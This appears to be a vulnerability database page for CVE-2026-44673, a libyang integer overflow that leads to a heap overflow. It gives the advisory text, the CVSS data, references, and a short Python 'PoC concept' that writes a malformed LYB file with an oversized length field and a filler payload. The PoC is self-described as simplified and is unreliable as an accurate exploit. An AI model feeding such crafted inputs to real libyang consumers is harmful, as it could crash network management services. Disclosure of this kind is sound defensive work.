CVE-2026-44673

Description

libyang is a YANG data modeling language library. Prior to SO 5.2.15, lyb_read_string() in src/parser_lyb.c contains an integer overflow that results in a heap buffer overflow when parsing a maliciously crafted LYB binary blob. An attacker who can supply LYB data to any libyang consumer (NETCONF server, sysrepo, etc.) can trigger a crash or potential heap corruption. This vulnerability is fixed in SO 5.2.15.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

libyang < SO 5.2.15

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC Concept for CVE-2026-44673
# This script demonstrates the concept of triggering the integer overflow
# by crafting a malicious LYB binary blob.

import struct

def create_malicious_lyb():
    # Simulating a crafted LYB blob header
    # The vulnerability is triggered in lyb_read_string() via integer overflow
    # We construct a length field that causes the overflow
    
    # Arbitrary header bytes (simplified)
    data = b'\x00' * 20
    
    # Malicious size intended to cause overflow in allocation logic
    # e.g., a value that wraps around when multiplied or added
    evil_size = struct.pack('<I', 0xffffff00) 
    
    # Payload to overflow the allocated buffer
    payload = b'A' * 0x1000
    
    return data + evil_size + payload

with open('cve_2026_44673_poc.lyb', 'wb') as f:
    f.write(create_malicious_lyb())

print('Malicious LYB file generated.')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44673
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44673
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44673/
[4] VulDB https://vuldb.com/cve/CVE-2026-44673
[5] https://github.com/CESNET/libyang/security/advisories/GHSA-vw2p-pq79-92xh

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44673", "sourceIdentifier": "[email protected]", "published": "2026-05-14T21:16:47.500", "lastModified": "2026-05-14T21:16:47.500", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "libyang is a YANG data modeling language library. Prior to SO 5.2.15, lyb_read_string() in src/parser_lyb.c contains an integer overflow that results in a heap buffer overflow when parsing a maliciously crafted LYB binary blob. An attacker who can supply LYB data to any libyang consumer (NETCONF server, sysrepo, etc.) can trigger a crash or potential heap corruption. This vulnerability is fixed in SO 5.2.15."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}], "references": [{"url": "https://github.com/CESNET/libyang/security/advisories/GHSA-vw2p-pq79-92xh", "source": "[email protected]"}]}}